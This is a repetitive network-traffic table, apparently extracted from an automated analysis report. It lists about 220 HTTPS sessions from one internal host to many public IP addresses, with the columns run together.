                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14180192.168.2.2347750167.86.152.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14181192.168.2.234633247.21.92.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14182192.168.2.235777057.102.78.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14183192.168.2.235265212.216.240.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14184192.168.2.235139851.223.239.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14185192.168.2.2357644164.74.2.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14186192.168.2.2358700103.255.244.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14187192.168.2.2333856102.145.65.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14188192.168.2.233493036.35.55.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14189192.168.2.2350324136.225.22.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14190192.168.2.234552880.10.131.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14191192.168.2.2358006203.41.31.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14192192.168.2.2346536205.249.37.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14193192.168.2.2346298110.58.203.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14194192.168.2.2347496147.194.51.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14195192.168.2.235466284.101.223.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14196192.168.2.235649852.113.117.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14197192.168.2.2336664118.229.215.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14198192.168.2.2344766156.156.111.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14199192.168.2.2353882125.84.194.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14200192.168.2.2353310205.229.130.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14201192.168.2.234417642.188.129.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14202192.168.2.235998069.12.139.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14203192.168.2.2340790117.198.183.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14204192.168.2.235741265.79.88.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14205192.168.2.233340658.252.142.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14206192.168.2.2360076216.216.8.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14207192.168.2.234396097.241.79.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14208192.168.2.234272618.110.176.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14209192.168.2.2360496118.88.251.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14210192.168.2.2338506186.26.153.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14211192.168.2.234340854.58.56.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14212192.168.2.2343780153.219.149.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14213192.168.2.233356831.251.32.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14214192.168.2.2343812195.253.114.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14215192.168.2.2359468205.57.224.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14216192.168.2.2337262176.250.85.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14217192.168.2.235850278.210.187.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14218192.168.2.234583018.53.3.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14219192.168.2.2337754169.198.155.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14220192.168.2.233445047.206.71.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14221192.168.2.2354746149.205.110.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14222192.168.2.233767019.46.253.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14223192.168.2.233282859.215.60.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14224192.168.2.2351110195.28.196.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14225192.168.2.2344092217.234.171.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14226192.168.2.2358972221.172.136.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14227192.168.2.2351364167.43.77.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14228192.168.2.2336370126.123.166.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14229192.168.2.235769273.51.236.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14230192.168.2.2344282178.37.23.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14231192.168.2.2337842209.127.38.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14232192.168.2.2343908219.204.4.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14233192.168.2.2355662216.77.210.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14234192.168.2.2347996142.77.197.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14235192.168.2.2353020115.249.9.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14236192.168.2.234911293.92.92.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14237192.168.2.2349648154.174.124.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14238192.168.2.2338688222.142.150.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14239192.168.2.2342222150.216.251.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14240192.168.2.2339332136.52.77.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14241192.168.2.2346448171.202.133.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14242192.168.2.235680067.135.127.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14243192.168.2.233627613.60.84.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14244192.168.2.235476687.72.48.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14245192.168.2.233861812.193.47.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14246192.168.2.2351526207.172.46.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14247192.168.2.235544294.186.184.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14248192.168.2.234621497.4.99.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14249192.168.2.2352244125.88.101.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14250192.168.2.2349924196.248.17.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14251192.168.2.2345580198.147.144.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14252192.168.2.233871880.25.104.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14253192.168.2.2353266205.188.33.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14254192.168.2.235568818.248.68.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14255192.168.2.233946640.42.214.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14256192.168.2.2344928106.142.154.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14257192.168.2.233663060.214.50.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14258192.168.2.2344420118.190.94.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14259192.168.2.2344730129.116.67.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14260192.168.2.234949873.218.157.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14261192.168.2.234539642.12.211.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14262192.168.2.235708035.216.193.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14263192.168.2.235200674.15.205.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14264192.168.2.234675648.70.175.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14265192.168.2.2339332179.129.216.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14266192.168.2.2358816132.93.231.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14267192.168.2.235492486.63.244.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14268192.168.2.23395328.68.68.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14269192.168.2.2333620117.161.198.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14270192.168.2.2347526216.85.166.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14271192.168.2.2360326157.168.218.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14272192.168.2.2354316170.15.22.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14273192.168.2.2352322187.241.105.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14274192.168.2.235874666.132.7.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14275192.168.2.234824276.116.128.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14276192.168.2.2355272195.244.165.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14277192.168.2.2351532165.185.116.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14278192.168.2.2333340118.9.184.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14279192.168.2.2339296188.227.233.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14280192.168.2.2360604114.93.250.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14281192.168.2.2355288115.36.23.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14282192.168.2.2355794167.225.30.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14283192.168.2.2349760199.5.156.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14284192.168.2.234665463.49.206.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14285192.168.2.235049884.223.205.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14286192.168.2.2336952206.117.149.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14287192.168.2.2337046124.193.141.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14288192.168.2.235030039.71.5.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14289192.168.2.234614052.236.186.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14290192.168.2.2359904190.168.71.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14291192.168.2.2342072131.164.69.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14292192.168.2.2351008177.11.159.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14293192.168.2.2341698108.61.164.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14294192.168.2.233804417.3.4.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14295192.168.2.234519247.38.91.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14296192.168.2.2338624157.75.228.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14297192.168.2.2333432177.91.47.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14298192.168.2.2357640187.22.144.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14299192.168.2.2338778171.58.191.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14300192.168.2.2337878140.194.40.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14301192.168.2.2344810206.80.234.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14302192.168.2.2337042165.137.203.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14303192.168.2.2349124103.213.229.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14304192.168.2.235696893.193.25.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14305192.168.2.235539483.107.198.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14306192.168.2.23547205.56.143.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14307192.168.2.235741295.101.53.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14308192.168.2.2347502211.128.16.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14309192.168.2.2352650204.167.210.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14310192.168.2.234498014.47.178.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14311192.168.2.2334666213.176.134.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14312192.168.2.234863831.71.45.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14313192.168.2.234518883.173.157.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14314192.168.2.233913445.89.18.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14315192.168.2.2346414201.90.150.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14316192.168.2.2348924219.98.189.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14317192.168.2.2354266161.140.140.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14318192.168.2.2354952106.35.136.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14319192.168.2.235982883.255.134.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14320192.168.2.233299284.12.243.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14321192.168.2.234519687.172.49.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14322192.168.2.2334904129.18.4.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14323192.168.2.2336312109.47.34.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14324192.168.2.233824019.22.247.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14325192.168.2.23529969.155.70.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14326192.168.2.234644482.180.240.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14327192.168.2.2341438213.152.235.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14328192.168.2.2350272108.241.119.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14329192.168.2.2356132154.28.92.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14330192.168.2.234335464.177.147.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14331192.168.2.2343254114.226.52.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14332192.168.2.2358798158.203.184.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14333192.168.2.234865269.66.45.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14334192.168.2.23356965.12.144.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14335192.168.2.235210092.66.243.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14336192.168.2.2347688209.61.45.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14337192.168.2.2341862192.207.154.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14338192.168.2.2337074176.146.50.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14339192.168.2.2356652160.248.230.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14340192.168.2.234133874.162.196.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14341192.168.2.2341460145.182.147.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14342192.168.2.2359796124.172.208.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14343192.168.2.234329057.82.225.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14344192.168.2.233957038.186.5.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14345192.168.2.2334500174.7.95.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14346192.168.2.235957898.10.94.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14347192.168.2.2353644163.251.100.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14348192.168.2.234840842.70.65.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14349192.168.2.2333328195.148.10.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14350192.168.2.234901279.230.212.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14351192.168.2.234452648.243.242.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14352192.168.2.233385280.139.130.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14353192.168.2.2342828122.238.87.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14354192.168.2.2335514152.69.69.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14355192.168.2.235083077.129.53.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14356192.168.2.233507836.177.31.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14357192.168.2.235735445.241.10.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14358192.168.2.233971435.219.35.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14359192.168.2.234450692.165.97.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14360192.168.2.2343876176.136.107.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14361192.168.2.2335054178.123.189.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14362192.168.2.234406459.227.212.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14363192.168.2.2335428125.124.217.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14364192.168.2.2348980154.178.1.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14365192.168.2.235017439.16.153.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14366192.168.2.2350236105.155.28.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14367192.168.2.2349412182.194.201.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14368192.168.2.233491646.152.134.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14369192.168.2.235400237.41.235.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14370192.168.2.234707054.80.89.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14371192.168.2.233384259.245.238.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14372192.168.2.233576259.150.106.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14373192.168.2.234631681.149.147.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14374192.168.2.2340976176.22.91.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14375192.168.2.2356028166.97.42.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14376192.168.2.233595027.143.103.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14377192.168.2.235924871.37.45.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14378192.168.2.235785054.81.126.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14379192.168.2.233399696.137.113.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14380192.168.2.2335622172.213.249.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14381192.168.2.2353614124.18.210.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14382192.168.2.2333132212.137.121.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14383192.168.2.23417069.167.138.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14384192.168.2.2344958207.247.88.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14385192.168.2.2332948157.14.188.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14386192.168.2.2345120114.170.181.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14387192.168.2.234668875.139.216.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14388192.168.2.2333638107.53.0.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14389192.168.2.2341318123.127.239.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14390192.168.2.2360704201.145.72.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14391192.168.2.2354570212.40.4.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14392192.168.2.2359644198.226.23.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14393192.168.2.2340512124.128.106.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14394192.168.2.2342736146.3.215.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14395192.168.2.2336580178.185.123.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14396192.168.2.234678687.51.165.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14397192.168.2.2337888111.146.160.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14398192.168.2.234104052.147.144.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14399192.168.2.23482261.205.196.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14400192.168.2.2357044112.50.137.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14401192.168.2.235682451.147.216.168443
